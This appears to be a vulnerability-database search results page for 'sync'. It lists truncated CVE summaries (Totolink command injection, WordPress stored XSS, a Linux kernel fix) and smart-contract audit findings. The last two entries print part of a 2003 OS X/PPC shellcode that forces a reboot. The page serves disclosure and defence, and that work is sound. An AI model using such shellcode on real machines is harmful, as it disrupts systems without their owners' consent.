16 matches found
CVE-2026-7721
A security vulnerability has been detected in Totolink WA300 5.2cu.7112B20190227. This affects the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. Such manipulation of the argument hostTime leads to command injection. The attack can be executed remotely. The exploit has been disclosed...
CVE-2025-11727
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2025-11727
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2025-11727
CVE-2025-11727 concerns Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto for WordPress. The WordPress plugin is susceptible to Stored Cross-Site Scripting via the sync() function in all versions up to 1.3.65, caused by insufficient input sanitization an...
EUVD-2025-201140
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2025-11727 Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration - Powered by Codisto <= 1.3.65 - Unauthenticated Stored Cross-Site Scripting
The Omnichannel for WooCommerce: Google, Amazon, eBay & Walmart Integration – Powered by Codisto plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the sync function in all versions up to, and including, 1.3.65 due to insufficient input sanitization and output escaping. This...
CVE-2022-49282
In the Linux kernel, the following vulnerability has been resolved: f2fs: quota: fix loop condition at f2fsquotasync cnt should be passed to sbhasquotaactive instead of type to check active quota properly. Moreover, when the type is -1, the compiler with enough inline knowledge can discard...
PT-2024-4058 · Totolink · Totolink Lr350
Name of the Vulnerable Software and Affected Versions: TOTOLINK LR350 version V9.3.5u.6369 B20220309 Description: The issue is related to the NTPSyncWithHost function in the TOTOLINK LR350 router's firmware, which lacks input validation. This can be exploited by a remote attacker to execute...
Upgraded Q -> 2 from #1784 [1698218728214]
Judge has assessed an item in Issue 1784 as 2 risk. The relevant finding follows: Low -2 UniV2LiquidityAmo.sol accounting might be temporarily out of sync In UniV2LiquidityAmo.sol, sync is an external function that can be called by anyone to update the lpTokenBalance. And lpTokenBalance is modifi...
The Rdpx V2 Core contract functionality blocking
Lines of code Vulnerability details Impact The RdpxV2Core contract functionality can be blocked as long as the contract WETH balance is less than totalWethDelegated. This can happen even without malicious activities. Proof of Concept The sync function of the RdpxV2Core contract has a special...
Attacker can DOS the sync function of RdpxV2Core which will brick critical functionality
Lines of code Vulnerability details Impact The sync function of the RdpxV2Core contract is critical for ensuring that the cached balances of the tokens in the contract are up to date. For example, all of the AMO logic involves sending tokens directly to the RdpxV2Core contract, meaning there's no...
Funds added to reserves through sync are accidentally transferred out to users
Lines of code Vulnerability details Impact Wells have the ability to shift funds to other Wells as part of gas-efficient multi-pool swaps. This natspec explanation of this can be find here. The sync function is intended to synchronize the underlying token amounts with the token reserves of the...
Router: Transferring Token to the Pair contract will cause future liquidity providers to lose funds
Lines of code Vulnerability details Impact Same as code-423n4/2022-01-elasticswap-findings146 In the current implementation, the amount of LP tokens to be minted when addLiquidity is calculated based on the ratio between the amount of newly added tokens and the reserve variable in the Pair...
The design of wibBTC is not fully compatible with the current Curve StableSwap pool
Handle WatchPug Vulnerability details Per the documentation, wibBTC is designed for a Curve StableSwap pool. However, the design of wibBTC makes the balances change dynamically and automatically. This is unusual for an ERC20 token, and it's not fully compatible with the current Curve StableSwap...
os-x/PPC reboot 28 bytes
Exploit for os-x/ppc platform in category shellcode ======================== os-x/PPC reboot 28 bytes ======================== / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4"...
os-x/PPC reboot 28 bytes
No description provided by source. / PPC OSX/Darwin Shellcode by B-r00t. 2003. Does sync reboot; See ASM below. 28 Bytes. / char shellcode = "\x7c\x63\x1a\x79" "\x39\x40\x01\x70" "\x38\x0a\xfe\xb4" "\x44\xff\xff\x02" "\x60\x60\x60\x60" "\x38\x0a\xfe\xc7" "\x44\xff\xff\x02"; int main void asm"b...